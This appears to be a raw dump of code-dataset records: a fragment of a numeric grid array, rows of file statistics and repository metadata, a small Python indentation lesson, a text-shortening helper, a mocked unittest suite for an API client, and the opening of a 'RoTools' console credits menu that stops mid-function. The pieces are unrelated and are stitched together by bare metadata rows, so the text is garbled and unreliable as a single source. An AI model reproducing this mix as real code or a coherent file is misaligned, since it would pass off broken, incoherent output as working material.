[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 1, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
return a
| 183.780822
| 281
| 0.306599
| 12,282
| 40,248
| 1.00456
| 0.00114
| 0.946831
| 1.377695
| 1.780191
| 0.994489
| 0.994408
| 0.994245
| 0.994245
| 0.994245
| 0.994245
| 0
| 0.489756
| 0.377882
| 40,248
| 218
| 282
| 184.623853
| 0.002995
| 0
| 0
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009302
| false
| 0
| 0
| 0
| 0.018605
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
b0189be67a7efcafdbbd98ae6766079f13864c9c
| 201
|
py
|
Python
|
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
bab-3/Indentation.py
|
pustakalupi/ls-belajar-python3.x
|
9d51916db2a57bb798b4eee81f5bea5a32a4cb90
|
[
"MIT"
] | null | null | null |
'''
done
'''
if True:
print ("Satu")
print ("Dua")
else:
print ("Tiga")
print ("Empat")
'''
if True:
print ("Satu")
print ("Dua")
else:
print ("Tiga")
print ("Empat")
'''
| 10.05
| 19
| 0.477612
| 23
| 201
| 4.173913
| 0.391304
| 0.125
| 0.229167
| 0.3125
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0.958333
| 0
| 0
| 0.283582
| 201
| 20
| 20
| 10.05
| 0.666667
| 0.019901
| 0
| 0
| 0
| 0
| 0.168421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
b0276ffa5e3e7e0cb2c4651c3953dea93309eb7b
| 97
|
py
|
Python
|
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | null | null | null |
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | 9
|
2021-03-19T01:51:38.000Z
|
2022-03-12T00:23:28.000Z
|
utils/helpers.py
|
kagadanta/siks-api
|
c5b02b548949b0db76e018bb6ab177dcde7974d6
|
[
"FTL"
] | null | null | null |
import textwrap
def short_text(text, width=30):
return textwrap.shorten(text, width=width)
| 16.166667
| 46
| 0.752577
| 14
| 97
| 5.142857
| 0.642857
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024096
| 0.14433
| 97
| 5
| 47
| 19.4
| 0.843373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c6d62007adef5f8736c8dc3726e06b244366c371
| 6,091
|
py
|
Python
|
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | null | null | null |
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | 67
|
2021-02-26T02:06:42.000Z
|
2022-03-25T12:45:27.000Z
|
test/api/test_api.py
|
hubmapconsortium/ingest-api
|
8f360cc9c728baf55e74bef471f4e3630feb7777
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
import requests
from api.api import Api
#
# Running the tests... At the top level directory type 'nose2 --verbose --log-level debug`
#
# WARNING: ONLY methods beginning with "test_" will be considered tests by 'nose2' :-(
class TestApi(unittest.TestCase):
def setUp(self):
self.bearer_token = 'NiceToken'
self.api_url = 'http://www.kollar.com/'
self.url_path = "happy_goat.html"
self.api = Api(self.bearer_token, self.api_url)
def test_add_extra_headers_with(self):
headers = self.api.add_extra_headers({'extra_header': 'value'})
self.assertEqual(len(headers.keys()), 2)
self.assertTrue('Authorization' in headers)
self.assertEqual(headers['Authorization'], f"Bearer {self.bearer_token}")
self.assertTrue('extra_header' in headers)
self.assertEqual(headers['extra_header'], 'value')
def test_add_extra_headers_without(self):
headers = self.api.add_extra_headers({})
self.assertEqual(len(headers.keys()), 1)
self.assertTrue('Authorization' in headers)
self.assertEqual(headers['Authorization'], f"Bearer {self.bearer_token}")
self.assertFalse('extra_header' in headers)
@patch('api.api.requests.get')
def test_request_get(self, mock_get):
def resp1():
r = requests.Response()
r.status_code = 201
r.json = lambda: None
return r
mock_get.side_effect = [resp1()]
self.api.request_get(self.url_path)
mock_get.assert_called()
args = mock_get.call_args_list[-1]
self.assertTrue('url' in args[1])
self.assertEqual(args[1]['url'], f"{self.api_url}{self.url_path}")
self.assertTrue('headers' in args[1])
headers_from_call = args[1]['headers']
self.assertEqual(len(headers_from_call.keys()), 1)
self.assertTrue('Authorization' in headers_from_call)
self.assertEqual(headers_from_call['Authorization'], f"Bearer {self.bearer_token}")
self.assertTrue('verify' in args[1])
self.assertFalse(args[1]['verify'])
@patch('api.api.requests.get')
def test_request_get_public(self, mock_get):
def resp1():
r = requests.Response()
r.status_code = 201
r.json = lambda: None
return r
mock_get.side_effect = [resp1()]
self.api.request_get_public(self.url_path)
mock_get.assert_called()
args = mock_get.call_args_list[0]
self.assertTrue('url' in args[1])
self.assertEqual(args[1]['url'], f"{self.api_url}{self.url_path}")
self.assertFalse('headers' in args[1])
self.assertTrue('verify' in args[1])
self.assertFalse(args[1]['verify'])
@patch('api.api.requests.post')
def test_request_post(self, mock_post):
def resp1():
r = requests.Response()
r.status_code = 201
r.json = lambda: None
return r
mock_post.side_effect = [resp1()]
json = {'test': 'value'}
self.api.request_post(self.url_path, json)
mock_post.assert_called()
args = mock_post.call_args_list[-1]
self.assertTrue('url' in args[1])
self.assertEqual(args[1]['url'], f"{self.api_url}{self.url_path}")
self.assertTrue('json' in args[1])
self.assertEqual(args[1]['json'], json)
self.assertTrue('headers' in args[1])
headers_from_call = args[1]['headers']
self.assertEqual(len(headers_from_call.keys()), 1)
self.assertTrue('Authorization' in headers_from_call)
self.assertEqual(headers_from_call['Authorization'], f"Bearer {self.bearer_token}")
self.assertTrue('verify' in args[1])
self.assertFalse(args[1]['verify'])
@patch('api.api.requests.post')
def test_request_post_extra_headers(self, mock_post):
def resp1():
r = requests.Response()
r.status_code = 201
r.json = lambda: None
return r
mock_post.side_effect = [resp1()]
json = {'test': 'value'}
self.api.request_post(self.url_path, json, {'extra_header': 'value'})
mock_post.assert_called()
args = mock_post.call_args_list[-1]
self.assertTrue('url' in args[1])
self.assertEqual(args[1]['url'], f"{self.api_url}{self.url_path}")
self.assertTrue('json' in args[1])
self.assertEqual(args[1]['json'], json)
self.assertTrue('headers' in args[1])
headers_from_call = args[1]['headers']
self.assertEqual(len(headers_from_call.keys()), 2)
self.assertTrue('Authorization' in headers_from_call)
self.assertEqual(headers_from_call['Authorization'], f"Bearer {self.bearer_token}")
self.assertTrue('extra_header' in headers_from_call)
self.assertEqual(headers_from_call['extra_header'], 'value')
self.assertTrue('verify' in args[1])
self.assertFalse(args[1]['verify'])
@patch('api.api.requests.put')
def test_request_put(self, mock_put):
def resp1():
r = requests.Response()
r.status_code = 201
r.json = lambda: None
return r
mock_put.side_effect = [resp1()]
json = {'test': 'value'}
self.api.request_put(self.url_path, json)
mock_put.assert_called()
args = mock_put.call_args_list[-1]
self.assertTrue('url' in args[1])
self.assertEqual(args[1]['url'], f"{self.api_url}{self.url_path}")
self.assertTrue('json' in args[1])
self.assertEqual(args[1]['json'], json)
self.assertTrue('headers' in args[1])
headers_from_call = args[1]['headers']
self.assertEqual(len(headers_from_call.keys()), 1)
self.assertTrue('Authorization' in headers_from_call)
self.assertEqual(headers_from_call['Authorization'], f"Bearer {self.bearer_token}")
self.assertTrue('verify' in args[1])
self.assertFalse(args[1]['verify'])
| 34.219101
| 91
| 0.625185
| 784
| 6,091
| 4.669643
| 0.110969
| 0.047801
| 0.034417
| 0.042065
| 0.844032
| 0.807157
| 0.807157
| 0.786124
| 0.786124
| 0.748156
| 0
| 0.015682
| 0.235758
| 6,091
| 178
| 92
| 34.219101
| 0.770784
| 0.028403
| 0
| 0.7
| 0
| 0
| 0.154379
| 0.03162
| 0
| 0
| 0
| 0
| 0.453846
| 1
| 0.1
| false
| 0
| 0.030769
| 0
| 0.176923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
05b99425d32174477e22d2a498473fb7fed37eee
| 38,695
|
py
|
Python
|
Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | 1
|
2021-11-24T22:10:48.000Z
|
2021-11-24T22:10:48.000Z
|
Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | null | null | null |
Code/RoTools.py
|
RodrikWan/RoTools
|
bda0c9056b7cbc55118b6be2253787ea44a4a1b3
|
[
"MIT"
] | null | null | null |
# ═║╔╗╚╝╠╣╩╬
#Colorama
from colorama import *
#Others
import os, requests, random, string, base64
#Credits
def Credits():
os.system('title RoTools 0.1 - Credits')
os.system('cls')
print(F"{Fore.CYAN}╔═════════════════════════════════════════════════════════╗")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE}██████╗ █████╗ ████████╗ █████╗ █████╗ ██╗ ██████╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗██║ ██╔════╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██████╔╝██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚█████╗ {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██╔══██╗██║ ██║ ██║ ██║ ██║██║ ██║██║ ╚═══██╗{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}██║ ██║╚█████╔╝ ██║ ╚█████╔╝╚█████╔╝███████╗██████╔╝{Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE}╚═╝ ╚═╝ ╚════╝ ╚═╝ ╚════╝ ╚════╝ ╚══════╝╚═════╝ {Fore.CYAN}║")
print(F"{Fore.CYAN}╠═════════════════════════════════════════════════════════╣")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Made by: RodrikWan {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} Version: 0.1.0 {Fore.CYAN}║")
print(F"{Fore.CYAN}║ ║")#-------------------|
print(F"{Fore.CYAN}║{Fore.WHITE} Changelog: {Fore.CYAN}║")
print(F"{Fore.CYAN}║{Fore.WHITE} - Added Main Menu {Fore.CYAN}║")
